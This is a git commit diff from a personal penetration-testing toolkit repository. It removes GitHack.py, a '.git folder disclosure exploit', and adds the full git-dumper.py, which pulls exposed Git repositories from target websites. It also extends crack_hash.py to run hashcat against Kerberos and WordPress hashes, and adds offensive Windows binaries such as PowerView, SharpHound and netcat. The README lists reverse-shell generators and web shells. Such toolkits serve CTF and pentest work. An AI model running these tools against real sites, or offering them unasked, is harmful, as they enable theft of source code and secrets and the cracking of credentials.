win binaries + git-dumper + crack_hash

This commit is contained in:
Roman Hergenreder 2020-06-08 14:28:22 +02:00
parent 4c265dc683
commit 3f08063b4f
12 changed files with 21502 additions and 241 deletions

@ -1,236 +0,0 @@
#!/usr/bin/env python
from urllib.parse import urlparse
import threading
import collections
import binascii
import requests
import struct
import queue
import time
import ssl
import sys
import os
import re
def check(boolean, message):
if not boolean:
print("error: " + message)
exit(1)
def parse(filename, pretty=True):
with open(filename, "rb") as f:
# f = mmap.mmap(o.fileno(), 0, access=mmap.ACCESS_READ)
def read(format):
# "All binary numbers are in network byte order."
# Hence "!" = network order, big endian
format = "! " + format
bytes = f.read(struct.calcsize(format))
return struct.unpack(format, bytes)[0]
index = collections.OrderedDict()
# 4-byte signature, b"DIRC"
index["signature"] = f.read(4).decode("ascii")
check(index["signature"] == "DIRC", "Not a Git index file")
# 4-byte version number
index["version"] = read("I")
check(index["version"] in {2, 3},
"Unsupported version: %s" % index["version"])
# 32-bit number of index entries, i.e. 4-byte
index["entries"] = read("I")
yield index
for n in range(index["entries"]):
entry = collections.OrderedDict()
entry["entry"] = n + 1
entry["ctime_seconds"] = read("I")
entry["ctime_nanoseconds"] = read("I")
if pretty:
entry["ctime"] = entry["ctime_seconds"]
entry["ctime"] += entry["ctime_nanoseconds"] / 1000000000
del entry["ctime_seconds"]
del entry["ctime_nanoseconds"]
entry["mtime_seconds"] = read("I")
entry["mtime_nanoseconds"] = read("I")
if pretty:
entry["mtime"] = entry["mtime_seconds"]
entry["mtime"] += entry["mtime_nanoseconds"] / 1000000000
del entry["mtime_seconds"]
del entry["mtime_nanoseconds"]
entry["dev"] = read("I")
entry["ino"] = read("I")
# 4-bit object type, 3-bit unused, 9-bit unix permission
entry["mode"] = read("I")
if pretty:
entry["mode"] = "%06o" % entry["mode"]
entry["uid"] = read("I")
entry["gid"] = read("I")
entry["size"] = read("I")
entry["sha1"] = binascii.hexlify(f.read(20)).decode("ascii")
entry["flags"] = read("H")
# 1-bit assume-valid
entry["assume-valid"] = bool(entry["flags"] & (0b10000000 << 8))
# 1-bit extended, must be 0 in version 2
entry["extended"] = bool(entry["flags"] & (0b01000000 << 8))
# 2-bit stage (?)
stage_one = bool(entry["flags"] & (0b00100000 << 8))
stage_two = bool(entry["flags"] & (0b00010000 << 8))
entry["stage"] = stage_one, stage_two
# 12-bit name length, if the length is less than 0xFFF (else, 0xFFF)
namelen = entry["flags"] & 0xFFF
# 62 bytes so far
entrylen = 62
if entry["extended"] and (index["version"] == 3):
entry["extra-flags"] = read("H")
# 1-bit reserved
entry["reserved"] = bool(entry["extra-flags"] & (0b10000000 << 8))
# 1-bit skip-worktree
entry["skip-worktree"] = bool(entry["extra-flags"] & (0b01000000 << 8))
# 1-bit intent-to-add
entry["intent-to-add"] = bool(entry["extra-flags"] & (0b00100000 << 8))
# 13-bits unused
# used = entry["extra-flags"] & (0b11100000 << 8)
# check(not used, "Expected unused bits in extra-flags")
entrylen += 2
if namelen < 0xFFF:
entry["name"] = f.read(namelen).decode("utf-8", "replace")
entrylen += namelen
else:
# Do it the hard way
name = []
while True:
byte = f.read(1)
if byte == "\x00":
break
name.append(byte)
entry["name"] = b"".join(name).decode("utf-8", "replace")
entrylen += 1
padlen = (8 - (entrylen % 8)) or 8
nuls = f.read(padlen)
check(set(nuls) == set([0]), "padding contained non-NUL")
yield entry
f.close()
class Scanner(object):
def __init__(self):
self.base_url = sys.argv[-1]
self.domain = urlparse(sys.argv[-1]).netloc.replace(':', '_')
if not os.path.exists(self.domain):
os.mkdir(self.domain)
print('[+] Download and parse index file ...')
data = self._request_data(sys.argv[-1] + '/index')
with open('%s/index' % self.domain, 'wb') as f:
f.write(data)
self.queue = queue.Queue()
for entry in parse('index'):
if "sha1" in entry.keys():
self.queue.put((entry["sha1"].strip(), entry["name"].strip()))
try:
print(entry['name'])
except Exception as e:
pass
self.lock = threading.Lock()
self.thread_count = 20
self.STOP_ME = False
@staticmethod
def _request_data(url):
print(url)
res = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)'})
if res.status_code != 200:
raise Exception("Server returned: %d %s" % (res.status_code, res.reason))
return res.content
def _print(self, msg):
self.lock.acquire()
try:
print(msg)
except Exception as e:
pass
self.lock.release()
def get_back_file(self):
while not self.STOP_ME:
try:
sha1, file_name = self.queue.get(timeout=0.5)
except Exception as e:
break
try:
folder = '/objects/%s/' % sha1[:2]
data = self._request_data(self.base_url + folder + sha1[2:])
try:
data = zlib.decompress(data)
data = re.sub(r'blob \d+\00', '', data)
except:
# self._print('[Error] Fail to decompress %s' % file_name)
pass
target_dir = os.path.join(self.domain, os.path.dirname(file_name))
if target_dir and not os.path.exists(target_dir):
os.makedirs(target_dir)
with open(os.path.join(self.domain, file_name), 'wb') as f:
f.write(data)
self._print('[OK] %s' % file_name)
except Exception as e:
self._print('[Error] %s' % str(e))
self.exit_thread()
def exit_thread(self):
self.lock.acquire()
self.thread_count -= 1
self.lock.release()
def scan(self):
for i in range(self.thread_count):
t = threading.Thread(target=self.get_back_file)
t.start()
if __name__ == '__main__':
context = ssl._create_unverified_context()
if len(sys.argv) == 1:
msg = """
A `.git` folder disclosure exploit. By LiJieJie
Usage: GitHack.py http://www.target.com/.git/
bug-report: my[at]lijiejie.com (http://www.lijiejie.com)
"""
print(msg)
exit()
s = Scanner()
s.scan()
try:
while s.thread_count > 0:
time.sleep(0.1)
except KeyboardInterrupt as e:
s.STOP_ME = True
time.sleep(1.0)
print('User Aborted.')

@ -3,10 +3,10 @@
This repository contains self-made and common scripts for information gathering, enumeration and more.
### Enumeration: Initial Scans
- first_scan.sh: Performs initial nmap scan (-A, -T5, -p-)
- first_scan.sh: Performs initial nmap scan
- gobuster.sh: Performs gobuster dir scan with raft-large-words-lowercase.txt
- ssh-check-username.py: Check if user enumeration works for ssh
- GitHack.py
- [git-dumper.py](https://github.com/arthaud/git-dumper)
- [autorecon.py](https://github.com/Tib3rius/AutoRecon)
- subdomainFuzz.sh: Fuzzes subdomains for a given domain
@ -22,7 +22,7 @@ This repository contains self-made and common scripts for information gathering,
- genRevShell.py: Generates a reverse shell command (e.g. netcat, python, ...)
- [php-reverse-shell.php](https://github.com/pentestmonkey/php-reverse-shell)
- [p0wny-shell.php](https://github.com/flozz/p0wny-shell)
- [powercat.ps1][https://github.com/besimorhino/powercat]
- [powercat.ps1](https://github.com/besimorhino/powercat)
### Miscellaneous
- upload_file.py: Starts a local tcp server, for netcat usage

19
crack_hash.py Normal file → Executable file

@ -21,6 +21,7 @@ class HashType(enum.Enum):
RAW_MD5 = 0
MD5_PASS_SALT = 10
MD5_SALT_PASS = 20
WORDPRESS = 400
# SHA1
RAW_SHA1 = 100
@ -57,6 +58,11 @@ class HashType(enum.Enum):
CRYPT_SHA512 = 1800
CRYPT_APACHE = 1600
# Kerberos
KERBEROS_AS_REQ = 7500
KERBEROS_TGS_REP = 13100
KERBEROS_AS_REP = 18200
class Hash:
def __init__(self, hash):
@ -84,6 +90,14 @@ class Hash:
self.type.append(HashType.CRYPT_SHA512)
elif crypt_type == "apr1":
self.type.append(HashType.CRYPT_APACHE)
elif crypt_type == "krb5tgs":
self.type.append(HashType.KERBEROS_TGS_REP)
elif crypt_type == "krb5asreq":
self.type.append(HashType.KERBEROS_AS_REQ)
elif crypt_type == "krb5asrep":
self.type.append(HashType.KERBEROS_AS_REP)
elif crypt_type == "P":
self.type.append(HashType.WORDPRESS)
else:
self.isSalted = ":" in raw_hash
if self.isSalted:
@ -144,6 +158,7 @@ if len(sys.argv) < 2:
exit(1)
hashes = [Hash(x) for x in filter(None, [line.strip() for line in open(sys.argv[1],"r").readlines()])]
wordlist = "/usr/share/wordlists/rockyou.txt" if len(sys.argv) < 3 else sys.argv[2]
uncracked_hashes = { }
for hash in hashes:
@ -156,7 +171,7 @@ for hash in hashes:
if len(uncracked_hashes) > 0:
uncracked_types = list(uncracked_hashes.keys())
num_types = len(uncracked_types)
if num_types > 0:
if num_types > 1:
print("There are multiple uncracked hashes left with different hash types, choose one to proceed with hashcat:")
print()
@ -187,6 +202,6 @@ if len(uncracked_hashes) > 0:
fp.write(b"%s\n" % hash.hash.encode("UTF-8"))
fp.flush()
proc = subprocess.Popen(["hashcat", "-m", str(selected_type.value), "-a", "0", fp.name, "/usr/share/wordlists/rockyou.txt", "--force"])
proc = subprocess.Popen(["hashcat", "-m", str(selected_type.value), "-a", "0", fp.name, wordlist, "--force"])
proc.wait()
fp.close()

556
git-dumper.py Executable file

@ -0,0 +1,556 @@
#!/usr/bin/env python3
from contextlib import closing
import argparse
import multiprocessing
import os
import os.path
import re
import socket
import subprocess
import sys
import urllib.parse
import urllib3
import bs4
import dulwich.index
import dulwich.objects
import dulwich.pack
import requests
import socks
USER_AGENT = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
def printf(fmt, *args, file=sys.stdout):
if args:
fmt = fmt % args
file.write(fmt)
file.flush()
def is_html(response):
''' Return True if the response is a HTML webpage '''
return '<html>' in response.text
def get_indexed_files(response):
''' Return all the files in the directory index webpage '''
html = bs4.BeautifulSoup(response.text, 'html.parser')
files = []
for link in html.find_all('a'):
url = urllib.parse.urlparse(link.get('href'))
if (url.path and
url.path != '.' and
url.path != '..' and
not url.path.startswith('/') and
not url.scheme and
not url.netloc):
files.append(url.path)
return files
def create_intermediate_dirs(path):
''' Create intermediate directories, if necessary '''
dirname, basename = os.path.split(path)
if dirname and not os.path.exists(dirname):
try:
os.makedirs(dirname)
except FileExistsError:
pass # race condition
def get_referenced_sha1(obj_file):
''' Return all the referenced SHA1 in the given object file '''
objs = []
if isinstance(obj_file, dulwich.objects.Commit):
objs.append(obj_file.tree.decode())
for parent in obj_file.parents:
objs.append(parent.decode())
elif isinstance(obj_file, dulwich.objects.Tree):
for item in obj_file.iteritems():
objs.append(item.sha.decode())
elif isinstance(obj_file, dulwich.objects.Blob):
pass
else:
printf('error: unexpected object type: %r\n' % obj_file, file=sys.stderr)
sys.exit(1)
return objs
class Worker(multiprocessing.Process):
''' Worker for process_tasks '''
def __init__(self, pending_tasks, tasks_done, args):
super().__init__()
self.daemon = True
self.pending_tasks = pending_tasks
self.tasks_done = tasks_done
self.args = args
def run(self):
# initialize process
self.init(*self.args)
# fetch and do tasks
while True:
task = self.pending_tasks.get(block=True)
if task is None: # end signal
return
result = self.do_task(task, *self.args)
assert isinstance(result, list), 'do_task() should return a list of tasks'
self.tasks_done.put(result)
def init(self, *args):
raise NotImplementedError
def do_task(self, task, *args):
raise NotImplementedError
def process_tasks(initial_tasks, worker, jobs, args=(), tasks_done=None):
''' Process tasks in parallel '''
if not initial_tasks:
return
tasks_seen = set(tasks_done) if tasks_done else set()
pending_tasks = multiprocessing.Queue()
tasks_done = multiprocessing.Queue()
num_pending_tasks = 0
# add all initial tasks in the queue
for task in initial_tasks:
assert task is not None
if task not in tasks_seen:
pending_tasks.put(task)
num_pending_tasks += 1
tasks_seen.add(task)
# initialize processes
processes = [worker(pending_tasks, tasks_done, args) for _ in range(jobs)]
# launch them all
for p in processes:
p.start()
# collect task results
while num_pending_tasks > 0:
task_result = tasks_done.get(block=True)
num_pending_tasks -= 1
for task in task_result:
assert task is not None
if task not in tasks_seen:
pending_tasks.put(task)
num_pending_tasks += 1
tasks_seen.add(task)
# send termination signal (task=None)
for _ in range(jobs):
pending_tasks.put(None)
# join all
for p in processes:
p.join()
class DownloadWorker(Worker):
''' Download a list of files '''
def init(self, url, directory, retry, timeout):
self.session = requests.Session()
self.session.verify = False
self.session.mount(url, requests.adapters.HTTPAdapter(max_retries=retry))
def do_task(self, filepath, url, directory, retry, timeout):
with closing(self.session.get('%s/%s' % (url, filepath),
allow_redirects=False,
stream=True,
timeout=timeout,
headers={"User-Agent": USER_AGENT})) as response:
printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code)
if response.status_code != 200:
return []
abspath = os.path.abspath(os.path.join(directory, filepath))
create_intermediate_dirs(abspath)
# write file
with open(abspath, 'wb') as f:
for chunk in response.iter_content(4096):
f.write(chunk)
return []
class RecursiveDownloadWorker(DownloadWorker):
''' Download a directory recursively '''
def do_task(self, filepath, url, directory, retry, timeout):
with closing(self.session.get('%s/%s' % (url, filepath),
allow_redirects=False,
stream=True,
timeout=timeout,
headers={"User-Agent": USER_AGENT})) as response:
printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code)
if (response.status_code in (301, 302) and
'Location' in response.headers and
response.headers['Location'].endswith(filepath + '/')):
return [filepath + '/']
if response.status_code != 200:
return []
if filepath.endswith('/'): # directory index
assert is_html(response)
return [filepath + filename for filename in get_indexed_files(response)]
else: # file
abspath = os.path.abspath(os.path.join(directory, filepath))
create_intermediate_dirs(abspath)
# write file
with open(abspath, 'wb') as f:
for chunk in response.iter_content(4096):
f.write(chunk)
return []
class FindRefsWorker(DownloadWorker):
''' Find refs/ '''
def do_task(self, filepath, url, directory, retry, timeout):
response = self.session.get('%s/%s' % (url, filepath),
allow_redirects=False,
timeout=timeout,
headers={"User-Agent": USER_AGENT})
printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code)
if response.status_code != 200:
return []
abspath = os.path.abspath(os.path.join(directory, filepath))
create_intermediate_dirs(abspath)
# write file
with open(abspath, 'w') as f:
f.write(response.text)
# find refs
tasks = []
for ref in re.findall(r'(refs(/[a-zA-Z0-9\-\.\_\*]+)+)', response.text):
ref = ref[0]
if not ref.endswith('*'):
tasks.append('.git/%s' % ref)
tasks.append('.git/logs/%s' % ref)
return tasks
class FindObjectsWorker(DownloadWorker):
''' Find objects '''
def do_task(self, obj, url, directory, retry, timeout):
filepath = '.git/objects/%s/%s' % (obj[:2], obj[2:])
response = self.session.get('%s/%s' % (url, filepath),
allow_redirects=False,
timeout=timeout,
headers={"User-Agent": USER_AGENT})
printf('[-] Fetching %s/%s [%d]\n', url, filepath, response.status_code)
if response.status_code != 200:
return []
abspath = os.path.abspath(os.path.join(directory, filepath))
create_intermediate_dirs(abspath)
# write file
with open(abspath, 'wb') as f:
f.write(response.content)
# parse object file to find other objects
obj_file = dulwich.objects.ShaFile.from_path(abspath)
return get_referenced_sha1(obj_file)
def fetch_git(url, directory, jobs, retry, timeout):
''' Dump a git repository into the output directory '''
assert os.path.isdir(directory), '%s is not a directory' % directory
assert not os.listdir(directory), '%s is not empty' % directory
assert jobs >= 1, 'invalid number of jobs'
assert retry >= 1, 'invalid number of retries'
assert timeout >= 1, 'invalid timeout'
# find base url
if not url.startswith("http://") and not url.startswith("https://"):
url = "http://" + url
url = url.rstrip('/')
if url.endswith('HEAD'):
url = url[:-4]
url = url.rstrip('/')
if url.endswith('.git'):
url = url[:-4]
url = url.rstrip('/')
# check for /.git/HEAD
printf('[-] Testing %s/.git/HEAD ', url)
response = requests.get('%s/.git/HEAD' % url, verify=False, allow_redirects=False, headers={"User-Agent": USER_AGENT})
printf('[%d]\n', response.status_code)
if response.status_code != 200:
printf('error: %s/.git/HEAD does not exist\n', url, file=sys.stderr)
return 1
elif not response.text.startswith('ref:'):
printf('error: %s/.git/HEAD is not a git HEAD file\n', url, file=sys.stderr)
return 1
# check for directory listing
printf('[-] Testing %s/.git/ ', url)
response = requests.get('%s/.git/' % url, verify=False, allow_redirects=False, headers={"User-Agent": USER_AGENT})
printf('[%d]\n', response.status_code)
if response.status_code == 200 and is_html(response) and 'HEAD' in get_indexed_files(response):
printf('[-] Fetching .git recursively\n')
process_tasks(['.git/', '.gitignore'],
RecursiveDownloadWorker,
jobs,
args=(url, directory, retry, timeout))
printf('[-] Running git checkout .\n')
os.chdir(directory)
subprocess.check_call(['git', 'checkout', '.'])
return 0
# no directory listing
printf('[-] Fetching common files\n')
tasks = [
'.gitignore',
'.git/COMMIT_EDITMSG',
'.git/description',
'.git/hooks/applypatch-msg.sample',
'.git/hooks/applypatch-msg.sample',
'.git/hooks/applypatch-msg.sample',
'.git/hooks/commit-msg.sample',
'.git/hooks/post-commit.sample',
'.git/hooks/post-receive.sample',
'.git/hooks/post-update.sample',
'.git/hooks/pre-applypatch.sample',
'.git/hooks/pre-commit.sample',
'.git/hooks/pre-push.sample',
'.git/hooks/pre-rebase.sample',
'.git/hooks/pre-receive.sample',
'.git/hooks/prepare-commit-msg.sample',
'.git/hooks/update.sample',
'.git/index',
'.git/info/exclude',
'.git/objects/info/packs',
]
process_tasks(tasks,
DownloadWorker,
jobs,
args=(url, directory, retry, timeout))
# find refs
printf('[-] Finding refs/\n')
tasks = [
'.git/FETCH_HEAD',
'.git/HEAD',
'.git/ORIG_HEAD',
'.git/config',
'.git/info/refs',
'.git/logs/HEAD',
'.git/logs/refs/heads/master',
'.git/logs/refs/remotes/origin/HEAD',
'.git/logs/refs/remotes/origin/master',
'.git/logs/refs/stash',
'.git/packed-refs',
'.git/refs/heads/master',
'.git/refs/remotes/origin/HEAD',
'.git/refs/remotes/origin/master',
'.git/refs/stash',
'.git/refs/wip/wtree/refs/heads/master', #Magit
'.git/refs/wip/index/refs/heads/master' #Magit
]
process_tasks(tasks,
FindRefsWorker,
jobs,
args=(url, directory, retry, timeout))
# find packs
printf('[-] Finding packs\n')
tasks = []
# use .git/objects/info/packs to find packs
info_packs_path = os.path.join(directory, '.git', 'objects', 'info', 'packs')
if os.path.exists(info_packs_path):
with open(info_packs_path, 'r') as f:
info_packs = f.read()
for sha1 in re.findall(r'pack-([a-f0-9]{40})\.pack', info_packs):
tasks.append('.git/objects/pack/pack-%s.idx' % sha1)
tasks.append('.git/objects/pack/pack-%s.pack' % sha1)
process_tasks(tasks,
DownloadWorker,
jobs,
args=(url, directory, retry, timeout))
# find objects
printf('[-] Finding objects\n')
objs = set()
packed_objs = set()
# .git/packed-refs, .git/info/refs, .git/refs/*, .git/logs/*
files = [
os.path.join(directory, '.git', 'packed-refs'),
os.path.join(directory, '.git', 'info', 'refs'),
os.path.join(directory, '.git', 'FETCH_HEAD'),
os.path.join(directory, '.git', 'ORIG_HEAD'),
]
for dirpath, _, filenames in os.walk(os.path.join(directory, '.git', 'refs')):
for filename in filenames:
files.append(os.path.join(dirpath, filename))
for dirpath, _, filenames in os.walk(os.path.join(directory, '.git', 'logs')):
for filename in filenames:
files.append(os.path.join(dirpath, filename))
for filepath in files:
if not os.path.exists(filepath):
continue
with open(filepath, 'r') as f:
content = f.read()
for obj in re.findall(r'(^|\s)([a-f0-9]{40})($|\s)', content):
obj = obj[1]
objs.add(obj)
# use .git/index to find objects
index_path = os.path.join(directory, '.git', 'index')
if os.path.exists(index_path):
index = dulwich.index.Index(index_path)
for entry in index.iterblobs():
objs.add(entry[1].decode())
# use packs to find more objects to fetch, and objects that are packed
pack_file_dir = os.path.join(directory, '.git', 'objects', 'pack')
if os.path.isdir(pack_file_dir):
for filename in os.listdir(pack_file_dir):
if filename.startswith('pack-') and filename.endswith('.pack'):
pack_data_path = os.path.join(pack_file_dir, filename)
pack_idx_path = os.path.join(pack_file_dir, filename[:-5] + '.idx')
pack_data = dulwich.pack.PackData(pack_data_path)
pack_idx = dulwich.pack.load_pack_index(pack_idx_path)
pack = dulwich.pack.Pack.from_objects(pack_data, pack_idx)
for obj_file in pack.iterobjects():
packed_objs.add(obj_file.sha().hexdigest())
objs |= set(get_referenced_sha1(obj_file))
# fetch all objects
printf('[-] Fetching objects\n')
process_tasks(objs,
FindObjectsWorker,
jobs,
args=(url, directory, retry, timeout),
tasks_done=packed_objs)
# git checkout
printf('[-] Running git checkout .\n')
os.chdir(directory)
# ignore errors
subprocess.call(['git', 'checkout', '.'], stderr=open(os.devnull, 'wb'))
return 0
if __name__ == '__main__':
parser = argparse.ArgumentParser(usage='%(prog)s [options] URL DIR',
description='Dump a git repository from a website.')
parser.add_argument('url', metavar='URL',
help='url')
parser.add_argument('directory', metavar='DIR',
help='output directory')
parser.add_argument('--proxy',
help='use the specified proxy')
parser.add_argument('-j', '--jobs', type=int, default=10,
help='number of simultaneous requests')
parser.add_argument('-r', '--retry', type=int, default=3,
help='number of request attempts before giving up')
parser.add_argument('-t', '--timeout', type=int, default=3,
help='maximum time in seconds before giving up')
args = parser.parse_args()
# jobs
if args.jobs < 1:
parser.error('invalid number of jobs')
# retry
if args.retry < 1:
parser.error('invalid number of retries')
# timeout
if args.timeout < 1:
parser.error('invalid timeout')
# proxy
if args.proxy:
proxy_valid = False
for pattern, proxy_type in [
(r'^socks5:(.*):(\d+)$', socks.PROXY_TYPE_SOCKS5),
(r'^socks4:(.*):(\d+)$', socks.PROXY_TYPE_SOCKS4),
(r'^http://(.*):(\d+)$', socks.PROXY_TYPE_HTTP),
(r'^(.*):(\d+)$', socks.PROXY_TYPE_SOCKS5)]:
m = re.match(pattern, args.proxy)
if m:
socks.setdefaultproxy(proxy_type, m.group(1), int(m.group(2)))
socket.socket = socks.socksocket
proxy_valid = True
break
if not proxy_valid:
parser.error('invalid proxy')
# output directory
if not os.path.exists(args.directory):
os.makedirs(args.directory)
if not os.path.isdir(args.directory):
parser.error('%s is not a directory' % args.directory)
if os.listdir(args.directory):
parser.error('%s is not empty' % args.directory)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# fetch everything
code = fetch_git(args.url, args.directory, args.jobs, args.retry, args.timeout)
path = os.path.realpath(args.directory)
if not os.listdir(path):
os.rmdir(path)
sys.exit(code)

12
util.py

@ -1,6 +1,7 @@
import random
import socket
import netifaces as ni
import sys
def getAddress(interface="tun0"):
if not interface in ni.interfaces():
@ -35,3 +36,14 @@ def openServer(address, ports=None):
if not retry:
print("Unable to listen on port %d: %s" % (listenPort, str(e)))
raise e
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: %s [command]" % sys.argv[0])
exit(1)
if sys.argv[1] == "getAddress":
if len(sys.argv) > 2:
print(getAddress(sys.argv[2]))
else:
print(getAddress())

20914
win/PowerView.ps1 Normal file

File diff suppressed because it is too large Load Diff

BIN
win/SharpHound.exe Normal file

Binary file not shown.

BIN
win/nc.exe Normal file

Binary file not shown.

BIN
win/nc64.exe Normal file

Binary file not shown.